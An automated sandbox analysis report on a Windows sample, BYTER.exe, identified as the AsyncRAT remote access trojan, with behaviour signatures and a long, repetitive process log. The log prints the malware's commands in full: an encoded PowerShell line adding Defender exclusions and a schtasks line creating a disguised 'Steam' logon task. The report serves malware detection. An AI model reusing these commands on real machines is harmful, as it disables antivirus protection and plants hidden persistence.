Analysis Overview
SHA256
ceb87fb8fc18a0699bac5b532cfdad64cfdf755efccb03b2571679460b465724
Threat Level: Known bad
The file BYTER.exe was found to be: Known bad.
Malicious Activity Summary
AsyncRat
Async RAT payload
Loads dropped DLL
Checks computer location settings
Executes dropped EXE
Enumerates physical storage devices
Command and Scripting Interpreter: PowerShell
Unsigned PE
Uses Task Scheduler COM API
Creates scheduled task(s)
Suspicious use of WriteProcessMemory
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: EnumeratesProcesses
Delays execution with timeout.exe
MITRE ATT&CK Matrix V13
Analysis: static1
Detonation Overview
Reported
2024-06-03 07:20
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral2
Detonation Overview
Submitted
2024-06-03 07:20
Reported
2024-06-03 07:23
Platform
win10v2004-20240508-en
Max time kernel
6s
Max time network
96s
Command Line
Signatures
AsyncRat
Async RAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\BYTER.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\MAIN.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\MAIN.exe | N/A |
Command and Scripting Interpreter: PowerShell
Enumerates physical storage devices
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Steam" /tr '"C:\Users\Admin\AppData\Roaming\Steam.exe"' & exit
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp4A67.tmp.bat""
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "Steam" /tr '"C:\Users\Admin\AppData\Roaming\Steam.exe"'
C:\Windows\system32\timeout.exe
timeout 3
C:\Users\Admin\AppData\Roaming\Steam.exe
"C:\Users\Admin\AppData\Roaming\Steam.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Steam" /tr '"C:\Users\Admin\AppData\Roaming\Steam.exe"' & exit
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "Steam" /tr '"C:\Users\Admin\AppData\Roaming\Steam.exe"'
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
